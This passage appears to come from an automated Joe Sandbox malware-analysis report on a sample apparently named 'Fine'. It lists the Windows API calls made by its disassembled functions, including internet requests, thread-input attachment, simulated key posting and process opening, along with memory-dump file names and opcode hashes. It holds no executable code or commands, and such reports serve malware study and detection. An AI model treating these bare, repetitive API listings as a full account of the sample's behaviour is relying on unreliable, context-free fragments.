                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBC4
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBD9
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBE4
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f2e7586a9019fea963464b0d529b6122fa88be17c8c6fd824ebb2e131e32446
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 06691d5dc6d95571700d4ff3a2b14068362140b86812e7e34a9a225e2082fa73
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f2e7586a9019fea963464b0d529b6122fa88be17c8c6fd824ebb2e131e32446
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 573180B5A14209AFDB16AF14FC8CF79F7AAAB4571AF208005FF05D61A4DBF4D8409B21
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001D2AF9
                                                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 001D2B98
                                                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 001D2D7D
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00213A1B
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00213A80
                                                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00213AAD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7071118f954bfe7dfa1f5bfa20edb2176a0c83d7fb863e39811b12a7e91ccefc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 658f3aab44968ead661c74b7cbcd93c7682cf6a72fd194fda064055be364d0c8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7071118f954bfe7dfa1f5bfa20edb2176a0c83d7fb863e39811b12a7e91ccefc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D19131715212CFCB29EF54C489A69F7A5BF24714F1142AEE55A6B352CB30EE62CF40
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002489F2
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248A06
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00248A30
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00248A4A
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248A5C
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248AA5
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00248AF5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0b0aa34982f2e0a561ef975b3213e030f6ca81a6d947c5abaeb4abca1fb1fb75
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e2fb06c8c1194db178e1bde034a143f099768fa81feca29661ae67cd2dec2b70
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b0aa34982f2e0a561ef975b3213e030f6ca81a6d947c5abaeb4abca1fb1fb75
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F81AE729386069BCB28EF14C444ABEB3E8BF98310F544C1AF985DB350DB74D9558B92
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00268992
                                                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0026899E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00268A79
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00268AAC
                                                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00268AE4
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00268B06
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00268B1E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 4072528602-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d3a4ebb76fb938b1d4f70c1ba7b9afd0076a3de8ccf2b703c035f327dd49eee0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 58700e8d732dbf63b80a94880b0f4d495046d2629d45c88f8b1adb0cc815a4e4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3a4ebb76fb938b1d4f70c1ba7b9afd0076a3de8ccf2b703c035f327dd49eee0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A71B074611206AFEB21DF94C884FBABBB9FF09300F14465AE845A7361CB71ADE4CB51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 001D74D7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: GetClientRect.USER32(?,?), ref: 001D758D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: GetWindowRect.USER32(?,?), ref: 001D75CE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: ScreenToClient.USER32(?,?), ref: 001D75F6
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00216083
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00216096
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002160A4
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002160B9
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 002160C1
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00216152
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0024CCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024CCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0024CD0F
• GetLastError.KERNEL32 ref: 0024CD67
• SetEvent.KERNEL32(?), ref: 0024CD7B
• InternetCloseHandle.WININET(00000000), ref: 0024CD86
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002155AE,?,?,Bad directive syntax error,0026DCD0,00000000,00000010,?,?), ref: 0023A236
• LoadStringW.USER32(00000000,?,002155AE,?), ref: 0023A23D
  • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0023A301
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
APIs
• GetParent.USER32 ref: 002329F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00232A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00232A9A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
• GetClientRect.USER32(?,?), ref: 001D758D
• GetWindowRect.USER32(?,?), ref: 001D75CE
• ScreenToClient.USER32(?,?), ref: 001D75F6
• GetClientRect.USER32(?,?), ref: 001D773A
• GetWindowRect.USER32(?,?), ref: 001D775B
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b18ad6a89d70349051d1a17bb43a8f5ea43edf12d79abd8d8109d061d798c30
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0a6827790c6db7971a663cde19b19c313dd08e321be491f9c846d674c37addf3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b18ad6a89d70349051d1a17bb43a8f5ea43edf12d79abd8d8109d061d798c30
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C17B3991465AEFDB10CFA8C544BEDB7F1FF18310F14841AE8A9A7390E734A991DB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 997c1a6edd34552f7ec3da913549b492b525fee52c85c573a26866488603d565
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef2e9f2b5bab96659ab43b6c87f05dddb5f1cfe0c9ddfbb7781c3564b8988a31
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 997c1a6edd34552f7ec3da913549b492b525fee52c85c573a26866488603d565
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF612871922706AFDB25AFF8D8856AE7BA49F02720F04416EFD44A72C3DA319C708B51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00265C24
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00265C65
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00265C6B
                                                                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00265C6F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002679F2: DeleteObject.GDI32(00000000), ref: 00267A1E
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00265CAB
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00265CB8
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00265CEB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00265D25
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00265D34
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6bc5180abe0b095859c7918df4c23df561bc2dcfe9a0530c9bbaf759aa961395
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 23ff49b36c608ae5f5d807d35acdc13a1cb9b76aa4b3501232d4717a8ee296c2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bc5180abe0b095859c7918df4c23df561bc2dcfe9a0530c9bbaf759aa961395
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5751C230A70A2ABFEF249F65CC49F983B65FB04754F148112FA149A2E0C7B5A9E4DF41
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0024CBC7
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024CBDA
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0024CBEE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0024CCB7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: GetLastError.KERNEL32 ref: 0024CD67
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: SetEvent.KERNEL32(?), ref: 0024CD7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: InternetCloseHandle.WININET(00000000), ref: 0024CD86
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: f1f110f383d1e3e50109eb3b8570b4a15debf581c96c6aa60d783ec7cebbdab5
• Instruction ID: 35f8047695fe3e12b6a2c9015ce615678e1e2bf626ca6401c6d815a246bc402d
• Opcode Fuzzy Hash: f1f110f383d1e3e50109eb3b8570b4a15debf581c96c6aa60d783ec7cebbdab5
• Instruction Fuzzy Hash: C8319E71611705AFCB699F79DD88A6ABBF8FF04704B24852EF85A82610C771D824AB60
APIs
  • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
  • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
  • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00232F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00232F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00232F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00232F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F5C
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00232F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00232F74
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 56e294d22d3e1fbbced24e53220f3bb89b5ae14afb110134bc1d88b1763099c4
• Instruction ID: 01a3944157b9feb228e5c39124fca1c80eedab8ba56024dc764e54f7d5b29ffb
• Opcode Fuzzy Hash: 56e294d22d3e1fbbced24e53220f3bb89b5ae14afb110134bc1d88b1763099c4
• Instruction Fuzzy Hash: 1D01D870794214BBFB106769EC8EF593F69DB4EB11F104051F318AF1E0C9E164548EA9
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00231D95,?,?,00000000), ref: 00232159
• HeapAlloc.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 00232160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00231D95,?,?,00000000), ref: 00232175
• GetCurrentProcess.KERNEL32(?,00000000,?,00231D95,?,?,00000000), ref: 0023217D
• DuplicateHandle.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 00232180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00231D95,?,?,00000000), ref: 00232190
• GetCurrentProcess.KERNEL32(00231D95,00000000,?,00231D95,?,?,00000000), ref: 00232198
• DuplicateHandle.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 0023219B
• CreateThread.KERNEL32(00000000,00000000,002321C1,00000000,00000000,00000000), ref: 002321B5
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 5c37457963c92f036c50531dd0f7fe4d6a313ab22241425c3b4c0cf6d7dd4fa6
• Instruction ID: b11c58ad8b0328f70e805ecba617e51c9f16da94733da53f356fabd984fdd12a
• Opcode Fuzzy Hash: 5c37457963c92f036c50531dd0f7fe4d6a313ab22241425c3b4c0cf6d7dd4fa6
• Instruction Fuzzy Hash: E801BFB5740348BFE710AF65EC4DF677BACEB89711F108451FA05DB1A1C6B19814CB20
APIs
  • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0023CF99
• _wcslen.LIBCMT ref: 0023CFE0
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0023D047
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0023D075
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: ,**$0$<**
• API String ID: 1227352736-173712272
• Opcode ID: cb529759fb9a4d9a2bc78bfa8f20d17067ec4a18d89b2a44af38a9bb2af7a4d6
• Instruction ID: cf84e0e372b929fd8c558975fb7d9d838eb8a3ad666787e7fb0cad61a835673f
• Opcode Fuzzy Hash: cb529759fb9a4d9a2bc78bfa8f20d17067ec4a18d89b2a44af38a9bb2af7a4d6
• Instruction Fuzzy Hash: 6E5104B16343029BD719EF38E844B6BB7E8AF55B14F040A2EF991E3191DBB0CD258752
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0023DDAC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0023DDBA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: CloseHandle.KERNEL32(00000000), ref: 0023DE87
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025ABCA
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025ABDD
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025AC10
